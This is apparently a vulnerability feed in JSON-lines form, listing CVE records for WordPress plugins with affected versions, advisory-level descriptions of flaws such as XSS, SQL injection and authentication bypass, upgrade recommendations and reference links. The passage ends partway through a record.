{"CVE_ID":"CVE-2025-8783","slug":"contact-manager","versionImpact":"8.6.5","versionEndExcluding":"8.6.6","description":"The Contact Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title\u2019 parameter in all versions up to, and including, 8.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 8.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-manager\\\/trunk\\\/admin-pages-functions.php#L524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-manager\\\/trunk\\\/admin-pages-functions.php#L524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3345750\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3345750\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e52a487-8e87-49b7-a044-9fb8452f3dd1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e52a487-8e87-49b7-a044-9fb8452f3dd1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3591","slug":"cf-geoplugin","versionEndExcluding":"8.6.5","description":"The Geo Controller WordPress plugin before 8.6.5 unserializes user input via some of its AJAX actions and REST API routes, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget is present on the blog.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f85d8b61-eaeb-433c-b857-06ee4db5c7d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f85d8b61-eaeb-433c-b857-06ee4db5c7d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1028","slug":"contact-manager","versionImpact":"8.6.4","versionEndExcluding":"8.6.5","description":"The Contact Manager plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the contact form upload feature in all versions up to, and including, 8.6.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible in specific configurations where the first extension is processed over the final. This vulnerability also requires successfully exploiting a race condition in order to exploit.","recommendation":"Update to version 8.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/contact-manager\\\/tags\\\/8.6.4&new_path=\\\/contact-manager\\\/tags\\\/8.6.5&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/contact-manager\\\/tags\\\/8.6.4&new_path=\\\/contact-manager\\\/tags\\\/8.6.5&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6f51a8e-4a59-4b64-b0c6-2ce3933a1df5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6f51a8e-4a59-4b64-b0c6-2ce3933a1df5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36833","slug":"indeed-membership-pro","versionImpact":"8.6","versionEndExcluding":"8.6.1","description":"The Indeed Membership Pro plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on various AJAX actions in versions 7.3 - 8.6. This makes it possible for authenticated attacker, with minimal permission, such as a subscriber, to perform a variety of actions such as modifying settings and viewing sensitive data.","recommendation":"Update to version 8.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab1cc1ef-d0e0-491d-91a8-eaa0605fc1da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab1cc1ef-d0e0-491d-91a8-eaa0605fc1da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9811025e-ab17-4255-aaaf-4f0306f5d281\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9811025e-ab17-4255-aaaf-4f0306f5d281\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36832","slug":"indeed-membership-pro","versionEndExcluding":"8.6.1","description":"The Ultimate Membership Pro plugin for WordPress is vulnerable to Authentication Bypass in versions between, and including, 7.3 to 8.6. This makes it possible for unauthenticated attackers to login as any user, including the site administrator with a default user ID of 1, via the username or user ID.","recommendation":"Update to version 8.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5341bbd-55bd-41ad-b5d1-d6b56c141277?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5341bbd-55bd-41ad-b5d1-d6b56c141277?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimate-membership-pro-wordpress-plugin\\\/12159253\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimate-membership-pro-wordpress-plugin\\\/12159253\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9811025e-ab17-4255-aaaf-4f0306f5d281\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9811025e-ab17-4255-aaaf-4f0306f5d281\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7502","slug":"js_composer","versionImpact":"8.5","versionEndExcluding":"8.6","description":"The WPBakery Page Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several shortcodes in all versions up to, and including, 8.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7c80143-c328-4cd1-95db-67de2edc058c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7c80143-c328-4cd1-95db-67de2edc058c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6136","slug":"wp-cart-for-digital-products","versionImpact":"8.5.5","versionEndExcluding":"8.5.6","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.6 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 8.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d85cfe4-4878-4530-ba78-7cfe33f3a8d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d85cfe4-4878-4530-ba78-7cfe33f3a8d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6134","slug":"wp-cart-for-digital-products","versionImpact":"8.5.5","versionEndExcluding":"8.5.6","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 8.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34d61f7e-90eb-4a64-a8a7-18f2d6518118\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34d61f7e-90eb-4a64-a8a7-18f2d6518118\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6133","slug":"wp-cart-for-digital-products","versionImpact":"8.5.5","versionEndExcluding":"8.5.6","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 8.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd613e1e-557c-4383-a3e9-4c14bc0be0c5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd613e1e-557c-4383-a3e9-4c14bc0be0c5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6076","slug":"wp-cart-for-digital-products","versionImpact":"8.5.4","versionEndExcluding":"8.5.5","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 8.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8369a2d8-1780-40c3-90ff-a826b9e9afd4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8369a2d8-1780-40c3-90ff-a826b9e9afd4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6075","slug":"wp-cart-for-digital-products","versionImpact":"8.5.4","versionEndExcluding":"8.5.5","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.5 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 8.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0e2658a-b075-48b6-a9d9-e141194117fc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0e2658a-b075-48b6-a9d9-e141194117fc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6074","slug":"wp-cart-for-digital-products","versionImpact":"8.5.4","versionEndExcluding":"8.5.5","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 8.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e518af46-cb8e-43ff-a7c1-5300b36d9113\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e518af46-cb8e-43ff-a7c1-5300b36d9113\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6073","slug":"wp-cart-for-digital-products","versionImpact":"8.5.4","versionEndExcluding":"8.5.5","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 8.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f04994bc-9eef-46de-995b-8598f7a749c4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f04994bc-9eef-46de-995b-8598f7a749c4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6072","slug":"wp-cart-for-digital-products","versionImpact":"8.5.4","versionEndExcluding":"8.5.5","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.5 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"Update to version 8.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d8a344b-37e9-41e8-9de0-c67b7ca8e21b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d8a344b-37e9-41e8-9de0-c67b7ca8e21b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6350","slug":"wpvr","versionImpact":"8.5.32","versionEndExcluding":"8.5.33","description":"The WP VR \u2013 360 Panorama and Free Virtual Tour Builder For WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018hotspot-hover\u2019 parameter in all versions up to, and including, 8.5.32 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 8.5.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvr\\\/trunk\\\/admin\\\/classes\\\/class-wpvr-ajax.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvr\\\/trunk\\\/admin\\\/classes\\\/class-wpvr-ajax.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3317520%40wpvr%2Ftrunk&old=3314284%40wpvr%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3317520%40wpvr%2Ftrunk&old=3314284%40wpvr%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce3d82ec-5f94-4511-a6ba-8ee1dec06160?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce3d82ec-5f94-4511-a6ba-8ee1dec06160?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9289","slug":"wp-wc-affiliate-program","versionImpact":"8.4.1","versionEndExcluding":"8.5.0","description":"The WordPress & WooCommerce Affiliate Program plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 8.4.1. This is due to the rtwwwap_login_request_callback() function not properly validating a user's identity prior to authenticating them to the site. This makes it possible for unauthenticated attackers to log in as any user, including administrators, granted they have access to the administrator's email.","recommendation":"Update to version 8.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed19835f-2718-41d8-95af-47c8b9589529?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed19835f-2718-41d8-95af-47c8b9589529?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-woocommerce-affiliate-program\\\/23580333\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-woocommerce-affiliate-program\\\/23580333\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4965","slug":"js_composer","versionImpact":"8.4.1","versionEndExcluding":"8.5","description":"The WPBakery Page Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Grid Builder feature in all versions up to, and including, 8.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0489172-279c-4397-a937-bca4840a196f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0489172-279c-4397-a937-bca4840a196f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4968","slug":"js_composer","versionImpact":"8.4.1","versionEndExcluding":"8.5","description":"The WPBakery Page Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple Page Builder elements (Copyright Element,  Hover Box, Separator With Text, FAQ, Single Image, Custom Header, Button, Call To Action, Progress Bar, Pie Chart, Round Chart, and Line Chart) in all versions up to, and including, 8.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10945855-675a-4a85-8bb2-84bc40c1b826?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10945855-675a-4a85-8bb2-84bc40c1b826?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4094","slug":"digits","versionEndExcluding":"8.4.6.1","description":"The DIGITS: WordPress Mobile Number Signup and Login WordPress plugin before 8.4.6.1 does not rate limit OTP validation attempts, making it straightforward for attackers to bruteforce them.","recommendation":"Update to version 8.4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5f0a263-644b-4954-a1f0-d08e2149edbb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5f0a263-644b-4954-a1f0-d08e2149edbb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12417","slug":"simple-link-directory","versionImpact":"8.4.5","versionEndExcluding":"8.4.6","description":"The The Simple Link Directory plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 8.4.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 8.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-link-directory\\\/trunk\\\/embed\\\/qcopd-embed-link.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-link-directory\\\/trunk\\\/embed\\\/qcopd-embed-link.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206971\\\/simple-link-directory\\\/trunk\\\/embed\\\/qcopd-embed-link.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206971\\\/simple-link-directory\\\/trunk\\\/embed\\\/qcopd-embed-link.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7112840-f190-4867-9408-c96408f28b7a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7112840-f190-4867-9408-c96408f28b7a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5673","slug":"blog2social","versionImpact":"8.4.4","versionEndExcluding":"8.4.5","description":"The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to SQL Injection via the \u2018prgSortPostType\u2019 parameter in all versions up to, and including, 8.4.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 8.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog2social\\\/tags\\\/8.4.4\\\/includes\\\/PRG\\\/Post\\\/Item.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog2social\\\/tags\\\/8.4.4\\\/includes\\\/PRG\\\/Post\\\/Item.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65b48fc0-27fd-4a37-afb8-2213ca0d4746?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65b48fc0-27fd-4a37-afb8-2213ca0d4746?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0439","slug":"nex-forms-express-wp-form-builder","versionEndExcluding":"8.4.4","description":"The NEX-Forms WordPress plugin before 8.4.4 does not escape its form name, which could lead to Stored Cross-Site Scripting issues. By default only SuperAdmins (in multisite) \/ admins (in single site) can create forms, however there is a settings allowing them to give lower roles access to such feature.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04cea9aa-b21c-49f8-836b-2d312253e09a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04cea9aa-b21c-49f8-836b-2d312253e09a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0203","slug":"digits","versionImpact":"8.4.1","versionEndExcluding":"8.4.2","description":"The Digits plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.4.1. This is due to missing nonce validation in the 'digits_save_settings' function. This makes it possible for unauthenticated attackers to modify the default role of registered users to elevate user privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 8.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84f2afb4-f1c6-4313-8958-38f1b5140a67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84f2afb4-f1c6-4313-8958-38f1b5140a67?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/digits.unitedover.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/digits.unitedover.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4133","slug":"blog2social","versionImpact":"8.3.3","versionEndExcluding":"8.4.0","description":"The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 8.4.0 does not escape the title of posts when outputting them in a dashboard, which could allow users with the contributor role to perform Cross-Site Scripting attacks.","recommendation":"Update to version 8.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebd7e5f5-af8d-42ca-b6ff-af92e03d4a3e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebd7e5f5-af8d-42ca-b6ff-af92e03d4a3e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2114","slug":"nex-forms-express-wp-form-builder","versionEndExcluding":"8.4","description":"The NEX-Forms WordPress plugin before 8.4 does not properly escape the `table` parameter, which is populated with user input, before concatenating it to an SQL query.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d8ab3a5-1bf8-4216-91fa-e89541e5c43d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d8ab3a5-1bf8-4216-91fa-e89541e5c43d\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/SchmidAlex\\\/nex-forms_SQL-Injection\",\"name\":\"https:\\\/\\\/github.com\\\/SchmidAlex\\\/nex-forms_SQL-Injection\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7559","slug":"wp-file-manager-pro","versionImpact":"8.3.7","versionEndExcluding":"8.3.8","description":"The File Manager Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and capability checks in the mk_file_folder_manager AJAX action in all versions up to, and including, 8.3.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 8.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4b45791-4b85-4a2d-8019-1d438bd694cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4b45791-4b85-4a2d-8019-1d438bd694cb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/filemanagerpro.io\\\/file-manager-pro\\\/\",\"name\":\"https:\\\/\\\/filemanagerpro.io\\\/file-manager-pro\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5317","slug":"newsletter","versionImpact":"8.3.4","versionEndExcluding":"8.3.5","description":"The Newsletter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'np1' parameter in all versions up to, and including, 8.3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 8.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4876e05e-efa6-46c6-832b-9ecc42934998?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4876e05e-efa6-46c6-832b-9ecc42934998?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095002\\\/newsletter\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095002\\\/newsletter\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6846","slug":"wp-file-manager-pro","versionImpact":"8.3.4","versionEndExcluding":"8.3.5","description":"The File Manager Pro plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 8.3.4 via the mk_check_filemanager_php_syntax AJAX function. This makes it possible for authenticated attackers, with subscriber access and above, to execute code on the server. Version 8.3.5 introduces a capability check that prevents users lower than admin from executing this function.","recommendation":"Update to version 8.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e8e0257-a745-495f-a103-c032b95209fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e8e0257-a745-495f-a103-c032b95209fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/gist.github.com\\\/Kun19\\\/046b2b305cac5f2edd38037984c2e8e3\",\"name\":\"https:\\\/\\\/gist.github.com\\\/Kun19\\\/046b2b305cac5f2edd38037984c2e8e3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0272","slug":"nex-forms-express-wp-form-builder","versionEndExcluding":"8.3.3","description":"The NEX-Forms WordPress plugin before 8.3.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/047b50c0-0eb3-4371-9e5d-3778fdafc66b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/047b50c0-0eb3-4371-9e5d-3778fdafc66b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0448","slug":"addons-for-elementor","versionImpact":"8.3.1","versionEndExcluding":"8.3.2","description":"The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget URL parameters in all versions up to, and including, 8.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 8.3.2, or a newer patched 